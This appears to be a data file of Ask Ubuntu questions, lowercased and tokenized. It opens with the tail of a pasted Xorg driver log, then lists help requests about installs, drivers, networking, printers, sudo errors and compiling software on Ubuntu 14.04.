[ 40.372 ] ( ww ) warning , could n't open module fglrx [ 40.372 ] ( ii ) unloadmodule : `` fglrx '' [ 40.372 ] ( ii ) unloading fglrx [ 40.373 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) [ 40.373 ] ( ii ) loadmodule : `` ati '' [ 40.373 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 40.373 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 40.373 ] compiled for 1.15.1 , module version = 7.3.0 [ 40.373 ] module class : x.org video driver [ 40.373 ] abi class : x.org video driver , version 15.0 [ 40.374 ] ( ii ) loadmodule : `` radeon '' [ 40.374 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 40.403 ] ( ii ) module radeon : vendor= '' x.org foundation '' [ 40.403 ] compiled for 1.15.1 , module version = 7.3.0 [ 40.403 ] module class : x.org video driver [ 40.408 ] abi class : x.org video driver , version 15.0 [ 40.409 ] ( ii ) loadmodule : `` modesetting '' [ 40.410 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 40.410 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 40.410 ] compiled for 1.15.0 , module version = 0.8.1 [ 40.410 ] module class : x.org video driver [ 40.410 ] abi class : x.org video driver , version 15.0 [ 40.410 ] ( ii ) loadmodule : `` fbdev '' [ 40.411 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 40.411 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 40.411 ] compiled for 1.15.0 , module version = 0.4.4 [ 40.411 ] module class : x.org video driver [ 40.411 ] abi class : x.org video driver , version 15.0 [ 40.411 ] ( ii ) loadmodule : `` vesa '' [ 40.425 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 40.425 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 40.425 ] compiled for 1.15.0 , module version = 2.3.3 [ 40.425 ] module class : x.org video driver [ 40.425 ] abi class : x.org video driver , version 15.0 [ 40.425 ] ( == ) matched fglrx as autoconfigured driver 0 [ 40.425 ] ( == ) matched ati as autoconfigured driver 1 [ 40.425 ] ( == ) matched fglrx as autoconfigured driver 2 [ 40.425 ] ( == ) matched ati as autoconfigured driver 3 [ 40.425 ] ( == ) matched modesetting as autoconfigured driver 4 [ 40.425 ] ( == ) matched fbdev as autoconfigured driver 5 [ 40.425 ] ( == ) matched vesa as autoconfigured driver 6 [ 40.425 ] ( == ) assigned the driver to the xf86configlayout [ 40.425 ] ( ii ) loadmodule : `` fglrx '' [ 40.426 ] ( ww ) warning , could n't open module fglrx [ 40.426 ] ( ii ) unloadmodule : `` fglrx '' [ 40.426 ] ( ii ) unloading fglrx [ 40.426 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) [ 40.426 ] ( ii ) loadmodule : `` ati '' [ 40.427 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 40.427 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 40.427 ] compiled for 1.15.1 , module version = 7.3.0 [ 40.427 ] module class : x.org video driver [ 40.427 ] abi class : x.org video driver , version 15.0 [ 40.427 ] ( ii ) loadmodule : `` modesetting '' [ 40.445 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 40.445 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 40.445 ] compiled for 1.15.0 , module version = 0.8.1 [ 40.445 ] module class : x.org video driver [ 40.445 ] abi class : x.org video driver , version 15.0 [ 40.445 ] ( ii ) unloadmodule : `` modesetting '' [ 40.445 ] ( ii ) unloading modesetting [ 40.446 ] ( ii ) failed to load module `` modesetting '' ( already loaded , 0 ) [ 40.446 ] ( ii ) loadmodule : `` fbdev '' [ 40.446 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 40.446 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 40.446 ] compiled for 1.15.0 , module version = 0.4.4 [ 40.446 ] module class : x.org video driver [ 40.446 ] abi class : x.org video driver , version 15.0 [ 40.446 ] ( ii ) unloadmodule : `` fbdev '' [ 40.446 ] ( ii ) unloading fbdev [ 40.446 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 40.446 ] ( ii ) loadmodule : `` vesa '' [ 40.447 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 40.447 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 40.447 ] compiled for 1.15.0 , module version = 2.3.3 [ 40.447 ] module class : x.org video driver [ 40.447 ] abi class : x.org video driver , version 15.0 [ 40.447 ] ( ii ) unloadmodule : `` vesa '' [ 40.447 ] ( ii ) unloading vesa [ 40.447 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 40.447 ] ( ii ) radeon : driver for ati radeon chipsets : ati radeon mobility x600 ( m24 ) 3150 ( pcie ) , ati firemv 2400 ( pci ) , ati radeon mobility x300 ( m24 ) 3152 ( pcie ) , ati firegl m24 gl 3154 ( pcie ) , ati firemv 2400 3155 ( pci ) , ati radeon x600 ( rv380 ) 3e50 ( pcie ) , ati firegl v3200 ( rv380 ) 3e54 ( pcie ) , ati radeon igp320 ( a3 ) 4136 , ati radeon igp330/340/350 ( a4 ) 4137 , ati radeon 9500 ad ( agp ) , ati radeon 9500 ae ( agp ) , ati radeon 9600tx af ( agp ) , ati firegl z1 ag ( agp ) , ati radeon 9800se ah ( agp ) , ati radeon 9800 ai ( agp ) , ati radeon 9800 aj ( agp ) , ati firegl x2 ak ( agp ) , ati radeon 9600 ap ( agp ) , ati radeon 9600se aq ( agp ) , ati radeon 9600xt ar ( agp ) , ati radeon 9600 as ( agp ) , ati firegl t2 at ( agp ) , ati radeon 9650 , ati firegl rv360 av ( agp ) , ati radeon 7000 igp ( a4+ ) 4237 , ati radeon 8500 aiw bb ( agp ) , ati radeon igp320m ( u1 ) 4336 , ati radeon igp330m/340m/350m ( u2 ) 4337 , ati radeon mobility 7000 igp 4437 , ati radeon 9000/pro if ( agp/pci ) , ati radeon 9000 ig ( agp/pci ) , ati radeon x800 ( r420 ) jh ( agp ) , ati radeon x800pro ( r420 ) ji ( agp ) , ati radeon x800se ( r420 ) jj ( agp ) , ati radeon x800 ( r420 ) jk ( agp ) , ati radeon x800 ( r420 ) jl ( agp ) , ati firegl x3 ( r420 ) jm ( agp ) , ati radeon mobility 9800 ( m18 ) jn ( agp ) , ati radeon x800 se ( r420 ) ( agp ) , ati radeon x800xt ( r420 ) jp ( agp ) , ati radeon x800 ve ( r420 ) jt ( agp ) , ati radeon x850 ( r480 ) ( agp ) , ati radeon x850 xt ( r480 ) ( agp ) , ati radeon x850 se ( r480 ) ( agp ) , ati radeon x850 pro ( r480 ) ( agp ) , ati radeon x850 xt pe ( r480 ) ( agp ) , ati radeon mobility m7 lw ( agp ) , ati mobility firegl 7800 m7 lx ( agp ) , ati radeon mobility m6 ly ( agp ) , ati radeon mobility m6 lz ( agp ) , ati firegl mobility 9000 ( m9 ) ld ( agp ) , ati radeon mobility 9000 ( m9 ) lf ( agp ) , ati radeon mobility 9000 ( m9 ) lg ( agp ) , ati firemv 2400 pci , ati radeon 9700 pro nd ( agp ) , ati radeon 9700/9500pro ne ( agp ) , ati radeon 9600tx nf ( agp ) , ati firegl x1 ng ( agp ) , ati radeon 9800pro nh ( agp ) , ati radeon 9800 ni ( agp ) , ati firegl x2 nk ( agp ) , ati radeon 9800xt nj ( agp ) , ati radeon mobility 9600/9700 ( m10/m11 ) np ( agp ) , ati radeon mobility 9600 ( m10 ) nq ( agp ) , ati radeon mobility 9600 ( m11 ) nr ( agp ) , ati radeon mobility 9600 ( m10 ) ns ( agp ) , ati firegl mobility t2 ( m10 ) nt ( agp ) , ati firegl mobility t2e ( m11 ) nv ( agp ) , ati radeon qd ( agp ) , ati radeon qe ( agp ) , ati radeon qf ( agp ) , ati radeon qg ( agp ) , ati firegl 8700/8800 qh ( agp ) , ati radeon 8500 ql ( agp ) , ati radeon 9100 qm ( agp ) , ati radeon 7500 qw ( agp/pci ) , ati radeon 7500 qx ( agp/pci ) , ati radeon ve/7000 qy ( agp/pci ) , ati radeon ve/7000 qz ( agp/pci ) , ati es1000 515e ( pci ) , ati radeon mobility x300 ( m22 ) 5460 ( pcie ) , ati radeon mobility x600 se ( m24c ) 5462 ( pcie ) , ati firegl m22 gl 5464 ( pcie ) , ati radeon x800 ( r423 ) uh ( pcie ) , ati radeon x800pro ( r423 ) ui ( pcie ) , ati radeon x800le ( r423 ) uj ( pcie ) , ati radeon x800se ( r423 ) uk ( pcie ) , ati radeon x800 xtp ( r430 ) ( pcie ) , ati radeon x800 xl ( r430 ) ( pcie ) , ati radeon x800 se ( r430 ) ( pcie ) , ati radeon x800 ( r430 ) ( pcie ) , ati firegl v7100 ( r423 ) ( pcie ) , ati firegl v5100 ( r423 ) uq ( pcie ) , ati firegl unknown ( r423 ) ur ( pcie ) , ati firegl unknown ( r423 ) ut ( pcie ) , ati mobility firegl v5000 ( m26 ) ( pcie ) , ati mobility firegl v5000 ( m26 ) ( pcie ) , ati mobility radeon x700 xl ( m26 ) ( pcie ) , ati mobility radeon x700 ( m26 ) ( pcie ) , ati mobility radeon x700 ( m26 ) ( pcie ) , ati radeon x550xtx 5657 ( pcie ) , ati radeon 9100 igp ( a5 ) 5834 , ati radeon mobility 9100 igp ( u3 ) 5835 , ati radeon xpress 200 5954 ( pcie ) , ati radeon xpress 200m 5955 ( pcie ) , ati radeon 9250 5960 ( agp ) , ati radeon 9200 5961 ( agp ) , ati radeon 9200 5962 ( agp ) , ati radeon 9200se 5964 ( agp ) , ati firemv 2200 ( pci ) , ati es1000 5969 ( pci ) , ati radeon xpress 200 5974 ( pcie ) , ati radeon xpress 200m 5975 ( pcie ) , ati radeon xpress 200 5a41 ( pcie ) , ati radeon xpress 200m 5a42 ( pcie ) , ati radeon xpress 200 5a61 ( pcie ) , ati radeon xpress 200m 5a62 ( pcie ) , ati radeon x300 ( rv370 ) 5b60 ( pcie ) , ati radeon x600 ( rv370 ) 5b62 ( pcie ) , ati radeon x550 ( rv370 ) 5b63 ( pcie ) , ati firegl v3100 ( rv370 ) 5b64 ( pcie ) , ati firemv 2200 pcie ( rv370 ) 5b65 ( pcie ) , ati radeon mobility 9200 ( m9+ ) 5c61 ( agp ) , ati radeon mobility 9200 ( m9+ ) 5c63 ( agp ) , ati mobility radeon x800 xt ( m28 ) ( pcie ) , ati mobility firegl v5100 ( m28 ) ( pcie ) , ati mobility radeon x800 ( m28 ) ( pcie ) , ati radeon x850 5d4c ( pcie ) , ati radeon x850 xt pe ( r480 ) ( pcie ) , ati radeon x850 se ( r480 ) ( pcie ) , ati radeon x850 pro ( r480 ) ( pcie ) , ati unknown radeon / firegl ( r480 ) 5d50 ( pcie ) , ati radeon x850 xt ( r480 ) ( pcie ) , ati radeon x800xt ( r423 ) 5d57 ( pcie ) , ati firegl v5000 ( rv410 ) ( pcie ) , ati radeon x700 xt ( rv410 ) ( pcie ) , ati radeon x700 pro ( rv410 ) ( pcie ) , ati radeon x700 se ( rv410 ) ( pcie ) , ati radeon x700 ( rv410 ) ( pcie ) , ati radeon x700 se ( rv410 ) ( pcie ) , ati radeon x1800 , ati mobility radeon x1800 xt , ati mobility radeon x1800 , ati mobility firegl v7200 , ati firegl v7200 , ati firegl v5300 , ati mobility firegl v7100 , ati radeon x1800 , ati radeon x1800 , ati radeon x1800 , ati radeon x1800 , ati radeon x1800 , ati firegl v7300 , ati firegl v7350 , ati radeon x1600 , ati rv505 , ati radeon x1300/x1550 , ati radeon x1550 , ati m54-gl , ati mobility radeon x1400 , ati radeon x1300/x1550 , ati radeon x1550 64-bit , ati mobility radeon x1300 , ati mobility radeon x1300 , ati mobility radeon x1300 , ati mobility radeon x1300 , ati radeon x1300 , ati radeon x1300 , ati rv505 , ati rv505 , ati firegl v3300 , ati firegl v3350 , ati radeon x1300 , ati radeon x1550 64-bit , ati radeon x1300/x1550 , ati radeon x1600 , ati radeon x1300/x1550 , ati mobility radeon x1450 , ati radeon x1300/x1550 , ati mobility radeon x2300 , ati mobility radeon x2300 , ati mobility radeon x1350 , ati mobility radeon x1350 , ati mobility radeon x1450 , ati radeon x1300 , ati radeon x1550 , ati mobility radeon x1350 , ati firemv 2250 , ati radeon x1550 64-bit , ati radeon x1600 , ati radeon x1650 , ati radeon x1600 , ati radeon x1600 , ati mobility firegl v5200 , ati mobility radeon x1600 , ati radeon x1650 , ati radeon x1650 , ati radeon x1600 , ati radeon x1300 xt/x1600 pro , ati firegl v3400 , ati mobility firegl v5250 , ati mobility radeon x1700 , ati mobility radeon x1700 xt , ati firegl v5200 , ati mobility radeon x1700 , ati radeon x2300hd , ati mobility radeon hd 2300 , ati mobility radeon hd 2300 , ati radeon x1950 , ati radeon x1900 , ati radeon x1950 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati radeon x1900 , ati amd stream processor , ati radeon x1900 , ati radeon x1950 , ati rv560 , ati rv560 , ati mobility radeon x1900 , ati rv560 , ati radeon x1950 gt , ati rv570 , ati rv570 , ati firegl v7400 , ati rv560 , ati radeon x1650 , ati radeon x1650 , ati rv560 , ati radeon 9100 pro igp 7834 , ati radeon mobility 9200 igp 7835 , ati radeon x1200 , ati radeon x1200 , ati radeon x1200 , ati radeon x1200 , ati radeon x1200 , ati rs740 , ati rs740m , ati rs740 , ati rs740m , ati radeon hd 2900 xt , ati radeon hd 2900 xt , ati radeon hd 2900 xt , ati radeon hd 2900 pro , ati radeon hd 2900 gt , ati firegl v8650 , ati firegl v8600 , ati firegl v7600 , ati radeon 4800 series , ati radeon hd 4870 x2 , ati radeon 4800 series , ati radeon hd 4850 x2 , ati firepro v8750 ( firegl ) , ati firepro v7760 ( firegl ) , ati mobility radeon hd 4850 , ati mobility radeon hd 4850 x2 , ati radeon 4800 series , ati firepro rv770 , amd firestream 9270 , amd firestream 9250 , ati firepro v8700 ( firegl ) , ati mobility radeon hd 4870 , ati mobility radeon m98 , ati mobility radeon hd 4870 , ati radeon 4800 series , ati radeon 4800 series , ati firepro m7750 , ati m98 , ati m98 , ati m98 , ati mobility radeon hd 4650 , ati radeon rv730 ( agp ) , ati mobility radeon hd 4670 , ati firepro m5750 , ati mobility radeon hd 4670 , ati radeon rv730 ( agp ) , ati rv730xt [ radeon hd 4670 ] , ati radeon e4600 , ati radeon hd 4600 series , ati rv730 pro [ radeon hd 4650 ] , ati firepro v7750 ( firegl ) , ati firepro v5700 ( firegl ) , ati firepro v3750 ( firegl ) , ati mobility radeon hd 4830 , ati mobility radeon hd 4850 , ati firepro m7740 , ati rv740 , ati radeon hd 4770 , ati radeon hd 4700 series , ati radeon hd 4770 , ati firepro m5750 , ati rv610 , ati radeon hd 2400 xt , ati radeon hd 2400 pro , ati radeon hd 2400 pro agp , ati firegl v4000 , ati rv610 , ati radeon hd 2350 , ati mobility radeon hd 2400 xt , ati mobility radeon hd 2400 , ati radeon e2400 , ati rv610 , ati firemv 2260 , ati rv670 , ati radeon hd3870 , ati mobility radeon hd 3850 , ati radeon hd3850 , ati mobility radeon hd 3850 x2 , ati rv670 , ati mobility radeon hd 3870 , ati mobility radeon hd 3870 x2 , ati radeon hd3870 x2 , ati firegl v7700 , ati radeon hd3850 , ati radeon hd3690 , amd firestream 9170 , ati radeon hd 4550 , ati radeon rv710 , ati radeon rv710 , ati radeon rv710 , ati radeon hd 4350 , ati mobility radeon 4300 series , ati mobility radeon 4500 series , ati mobility radeon 4500 series , ati firepro rg220 , ati mobility radeon 4330 , ati rv630 , ati mobility radeon hd 2600 , ati mobility radeon hd 2600 xt , ati radeon hd 2600 xt agp , ati radeon hd 2600 pro agp , ati radeon hd 2600 xt , ati radeon hd 2600 pro , ati gemini rv630 , ati gemini mobility radeon hd 2600 xt , ati firegl v5600 , ati firegl v3600 , ati radeon hd 2600 le , ati mobility firegl graphics processor , ati radeon hd 3470 , ati mobility radeon hd 3430 , ati mobility radeon hd 3400 series , ati radeon hd 3450 , ati radeon hd 3450 , ati radeon hd 3430 , ati radeon hd 3450 , ati firepro v3700 , ati firemv 2450 , ati firemv 2260 , ati firemv 2260 , ati radeon hd 3600 series , ati radeon hd 3650 agp , ati radeon hd 3600 pro , ati radeon hd 3600 xt , ati radeon hd 3600 pro , ati mobility radeon hd 3650 , ati mobility radeon hd 3670 , ati mobility firegl v5700 , ati mobility firegl v5725 , ati radeon hd 3200 graphics , ati radeon 3100 graphics , ati radeon hd 3200 graphics , ati radeon 3100 graphics , ati radeon hd 3300 graphics , ati radeon hd 3200 graphics , ati radeon 3000 graphics , sumo , sumo , sumo2 , sumo2 , sumo2 , sumo2 , sumo , sumo , sumo2 , sumo , sumo , sumo , sumo , sumo , ati radeon hd 4200 , ati radeon 4100 , ati mobility radeon hd 4200 , ati mobility radeon 4100 , ati radeon hd 4290 , ati radeon hd 4250 , amd radeon hd 6310 graphics , amd radeon hd 6310 graphics , amd radeon hd 6250 graphics , amd radeon hd 6250 graphics , amd radeon hd 6300 series graphics , amd radeon hd 6200 series graphics , palm , palm , palm , cypress , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , amd firestream 9370 , amd firestream 9350 , ati radeon hd 5800 series , ati radeon hd 5800 series , ati radeon hd 5800 series , ati radeon hd 5800 series , ati radeon hd 5900 series , ati radeon hd 5900 series , ati mobility radeon hd 5800 series , ati mobility radeon hd 5800 series , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , ati mobility radeon hd 5800 series , ati radeon hd 5700 series , ati radeon hd 5700 series , ati radeon hd 6700 series , or at least the first part of it . there is a limit of 30,000 characters . you can look at the whole thing at http : //www.jenuth.ca/xorg.0.log.html
492176	emachine t3104 locking during install	trying to install ubuntu 14.04 on an emachine t3104 its an amd machine with a via/s3g unichrome pro igp video card on the motherboard . when the install starts , i get either the entire screen or just the bottom half with lines of graphics , which will go away after a few seconds . then , again , at some random time , the screen will go completely vertical lines based on the image that was on the screen at the time . and there it hangs . i 've tried using the nomodeset option and i still get the same issue . tried different monitors . the thing has enough hd space and 2 gigs of ram . was running win xp home until i formatted the hd . from experience , if you can predict when something is going to crash , its hardware ; if it seems random , its software . any thoughts on how to complete the install ?
492177	how would you access a remote system tray with x11 forwarding via ssh ?	x11 forwarding is fantastic to remotely launch new programs . some popular programs open themselves into the system tray ( dropbox , for example ) . i know you can use vnc or rdp for this , but is there a way to do this with x11 forwarding & system tray ? does the xserver handle this ?
492178	how to make a song with lyrics	today i was trying to make a video using song lyrics but i could n't find a way , i want to add some effects for text ( animation ) and slide ( animation ) i know many programs windows relative but i do n't have windows , i 'm pure gnu/linux user , i want to know is there any method to do that under open source software , any help appreciate ! here is example of what i 'm trying to do https : //www.youtube.com/watch ? v=-yyg0upytbm
492181	link aggregation on a lxc bridge	i 'm working on a server with a number of various interfaces ( eth0-3 ) and i currently just use one for both host traffic and another for my lxc bridges traffic . since i have a few spare ports just laying around and i have a lot of traffic running over my bridge i thought i 'd use the other ports for some good old fashioned link aggregation . this is n't something i 've really messed with before , this n't really a question more a 'is this how i 'd implement this in /etc/network/interfaces ' ... so here we go . by my understanding i can just using the bonding thingy to bond eth1 and eth2 say ( or even eth3 ! ) to a device bond0 , and then just change the bridge_port of my bridge br0 to bond0 . now this all makes sense to me , what i 'm very confused about is how 'd do this if i did n't want to give bond0 an ip ... i currently have my br0 set to have no ip meaning the host is n't contact-able but all the lxc containers on the host which have routable ips so they can be contacted . how would i implement this ? can i just not give bond0 an ip and assume it will act in the same way ? here is my notes /etc/network/interface file on how i 'd how do it ( mind i have n't implemented this yet cuz i do n't want to down my entire hosts networks ) : # host communications times auto eth0 inet static iface eth0 inet static blahblahblah # first slave device auto eth1 iface eth1 inet manual bond-master bond0 # second slave device auto eth2 iface eth2 inet manual bond-master bond0 # our bond master or aggregation device auto bond0 iface bond0 inet manual # no ip ? gateway 192.168.1.1 netmask 255.255.255.0 bond-mode 0 # our bridge device auto br0 iface br0 inet manual # also no ip bridge_ports bond0 bridge_fd 0 bridge_maxwait 0
492185	error in installing package	chathuranga @ chathuranga-hp-1000-notebook-pc : ~/rtbth-3.9.3 $ make & & make install make -c /lib/modules/3.13.0-30-generic/build m=/home/chathuranga/rtbth-3.9.3 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-30-generic' cc [ m ] /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.o /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c : in function ‘rtbt_hci_dev_receive’ : /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:216:2 : warning : passing argument 1 of ‘hci_recv_frame’ from incompatible pointer type [ enabled by default ] status = hci_recv_frame ( skb ) ; ^ in file included from /home/chathuranga/rtbth-3.9.3/include/hps_bluez.h:32:0 , from /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:29 : include/net/bluetooth/hci_core.h:768:5 : note : expected ‘struct hci_dev *’ but argument is of type ‘struct sk_buff *’ int hci_recv_frame ( struct hci_dev *hdev , struct sk_buff *skb ) ; ^ /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:216:2 : error : too few arguments to function ‘hci_recv_frame’ status = hci_recv_frame ( skb ) ; ^ in file included from /home/chathuranga/rtbth-3.9.3/include/hps_bluez.h:32:0 , from /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:29 : include/net/bluetooth/hci_core.h:768:5 : note : declared here int hci_recv_frame ( struct hci_dev *hdev , struct sk_buff *skb ) ; ^ /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c : in function ‘rtbt_hps_iface_init’ : /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:404:13 : warning : assignment from incompatible pointer type [ enabled by default ] hdev- > send = rtbt_hci_dev_send ; ^ /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:406:6 : error : ‘struct hci_dev’ has no member named ‘ioctl’ hdev- > ioctl = rtbt_hci_dev_ioctl ; ^ /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c : at top level : /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.c:83:20 : warning : ‘pkt_type_str’ defined but not used [ -wunused-variable ] static const char *pkt_type_str [ ] = ^ make [ 2 ] : *** [ /home/chathuranga/rtbth-3.9.3/rtbth_core_bluez.o ] error 1 make [ 1 ] : *** [ _module_/home/chathuranga/rtbth-3.9.3 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-30-generic' make : *** [ all ] error 2
492186	software updater poping up every day - is this common in linux ?	i am very new in ubuntu . every day - some days more than once - a software updater appears in my left side bar . is this normal in linux ? do i really have every day to see this and restart my computer ? obviously , i do n't want to miss the updates recommended for ubuntu , but too often seems to be useless . is there a way to configure for updater to automatically install the most important packages ? or only search for the real important ones ? i am basically a java developer who will use eclipse , mysql and tomcat with some frameworks .
492190	question about compiling from ruby source and upgrade	i have three questions about compiling ruby ( and other softwares ) from source . ruby is avaliable to install using apt-get , but i want to learn more about linux and i want to compile from source . i am using ubuntu 14.04 lts . i first downloaded ruby source from ruby site and extracted in my home : /home/rgiaviti/ruby-2.1.2 . then , i opened terminal and typed : rgiaviti @ ubuntupc : ~ $ cd /home/ruby-2.1.2 rgiaviti @ ubuntupc : ~/ruby-2.1.2 $ ./configure rgiaviti @ ubuntupc : ~/ruby-2.1.2 $ make rgiaviti @ ubuntupc : ~/ruby-2.1.2 $ sudo make install after a lot of output , everything worked fine . absolutely fine . i tested ruby interpreter this way : ruby -- version output : ruby 2.1.2p95 ( 2014-05-08 revision 45877 ) [ x86_64-linux ] success , right ? now , my questions : when a new ruby interpreter is released , how do i upgrade my installed version ? just do the same thing i do when installing ? can i delete the folder that i extracted the source ( /home/rgiaviti/ruby-2.1.2 ) ? is there a way to uninstall the interpreter , like a apt-get remove , but for compiling from source ? i think , that 's all . thanks .
492192	install gopanda2 on ubuntu	i am trying to install gopanda2 into ubuntu . the download file is a tar.gz and can be found here . i extracted the folder to my desktop and then used the terminal to run the install.sh file . when that process finished i still could not run the application . this is the message from the terminal when running the install.sh file : installing gopanda2 to /home/brett/.local/bin cp : can not stat ‘gopanda2’ : no such file or directory cp : can not stat ‘nw.pak’ : no such file or directory cp : can not stat ‘libffmpegsumo.so’ : no such file or directory installing desktop file to /home/brett/desktop and /home/brett/.local/share/applications cp : can not stat ‘gopanda2.desktop’ : no such file or directory cp : can not stat ‘gopanda2.desktop’ : no such file or directory installing icon to /home/brett/.local/share/icons cp : can not stat ‘gopanda2.png’ : no such file or directory done ! any ideas on how to fix this ?
492194	keep iptables up to date	i 've installed iptables-persistent ( ubuntu 14.04 ) with the impression that it automatically saves iptables on shutdown but that appears not to be the case ? it seem to load saved rules at startup but unless i save them beforehand ( service iptables-persistent save ) they are loaded from an older ruleset . am i doing something wrong or is this the way the iptables-persistent package is meant to behave ? is there a recommended method of keeping /etc/iptables/rules.v4 current so that it is always up to date in the event of an unexpected power outage , or in case i restart and forget to save the rules ? i 've considered using a cron script but really not sure if i am simply misunderstanding or have something configured wrong .
492195	blank screen with grub	while working on dual bootable with windows xp & ubuntu , windos xp got corrupted . now every restart , computer halts with blank screen with a display of single word `` grub '' . kindly suggest me what to do now . not accepting any command .
492200	installing cp400 printer gives 'client-error-not-possible ' error	after upgrading from 13.10 to 14.04 and knowing that gutenprint 5.2.10 now supports canon selphy printers , i 've tried installing my cp400 through settings > printers . it finds the printer fine and lists the uri as : gutenprint52usb : //canon/selphycp400 ? serial=none_unknown & backend=canonselphy ... and then appears to find the drivers . but when i hit the apply button , i get : cups server error : there was an error during the cups operation : 'client-error-not-possible ' . if i go to localhost:631/admin and view the error log , the error appears as : returning ipp client-error-not-possible for cups-add-modify-printer ( ipp : //localhost/printers/canon-cp400 ) from localhost note that the path in the error is different than the path as entered . also , it seems that `` gutenprint52usb '' should have a plus sign in it - gutenprint52+usb - since that would then match the actual file name . i did try changing `` gutenprint52usb '' to `` ipp '' , per some answers i found in my search . that added the printer just fine , but of course , it did n't work ( as in nothing got to the printer ) . i 've tried reinstalling both cups and gutenprint through synaptic . rebooted . plugged/unplugged the printer numerous times . etc . if instead i attempt to add the printer through the localhost cups utility , it asks for a username and password . i only have one password on this machine and it works every time i log on or need to use sudo , so seems like it should work here but , alas , no . nor does using my username or root and the same password . merle
492207	linux media smart tv integration	from my windows laptop i am able to right click on a video file and choose 'play to - > sony bravia ' . this then connects to the tv and instructs it to play the media file . i assume , this essentially sets up a temporary dlna media server hosting only this one file and uses some sort of network command/api to instruct the tv to play the media on that media server . is there an equivalent simple functionality to achieve this within linux . i am aware of dlna media servers that can be setup , such as minidlna or serviio , etc . but this still requires the tv to be manually told to play the media . alternatively i would be able to create an extension for the various common file browsers ( nautilus , etc ) to provide a menu and scripts to provide this if i could find out how to instruct the tv to automatically play the media . does anyone know where i might be able to find information about controlling a sony bravia via the network connection ?
492212	strange issue using sudo	when i try to use sudo this is what happens chris @ vaio : ~ $ sudo sudo : 424273033461091241000 : invalid value except that does n't do it justice : i have been having issues with the latest kernel ( .30 ) and finally was able to boot into an older kernel ( .29 ) and it 's working somewhat , but now this has happened . does n't matter if i add anything after sudo or not , it 's still the same 'invalid value' any ideas ?
492216	trying to mount my nexus 7 via mtp	i 'm on ubuntu 14.04 and when i plug in my nexus 7 , nothing shows up in files to allow me transfer files onto the tablet . when i plug the tablet in i seem to be getting different error messages each time . unable to mount nexus 7 could n't find matching udev device unable to open a folder for nexus 7 the specified location is not mounted unable to find the requested file . please check the spelling and try again . unhandled error message : error when getting information for file '/run/user/1000/gvfs/mtp : host= % 5busb % 3a001 % 2c005 % 5d ' : no such file or directory tried connecting as ptp instead of mtp and i would get a message on my tablet that says connected as camera but nothing shows up on my computer .
492217	nvidia driver reset after each kernel update	i am using the official nvidia driver because my card ( geforce 750 ti ) is n't yet supported by the ubuntu one . every time the kernel updates , my system breaks . i 've formatted my system two-three times because of kernel updates and today i decided to try to fix it . i tried to fix it with this method and surprisingly it works . switch to console ( after waiting for the nvidia driver to crash , as it does when you switch consoles : p ) run a complete uninstall sudo ./ < driver > .run -uninstall reboot and switch to the on-board card update sudo apt-get update sudo apt-get dist-upgrade reboot again reinstall driver sudo ./ < driver > .run reboot and switch back to the nvidia gpu is there a better/easier/faster way to update without going through all this ?
492218	ethernet problems on asix ax88772b usb 2.0 ethernet adapter	i have some problems with ethernet on linux chrubuntu 3.13.0-29-generic . network manager shows the network is connected and the device is recognized , but there is no internet . interestingly it sometimes opens google.com and i am able to input queries , but they are very slow and nothing else works . here is some info : user @ chrubuntu : ~ $ sudo ifconfig -a [ sudo ] password for user : eth0 link encap : ethernet hwaddr 72 : b1 : b1 : c1 : d8:46 inet addr:129.118.162.17 bcast:129.118.163.255 mask:255.255.254.0 inet6 addr : fe80 : :70b1 : b1ff : fec1 : d846/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:18700 errors:0 dropped:0 overruns:0 frame:0 tx packets:2122 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2138423 ( 2.1 mb ) tx bytes:404200 ( 404.2 kb ) user @ chrubuntu : ~ $ lshw -c network warning : you should run this program as super-user . *-network description : wireless interface product : ar9462 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 01 serial : 14:2d:27 : b3:2a:6f width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.13.0-29-generic firmware=n/a latency=0 link=no 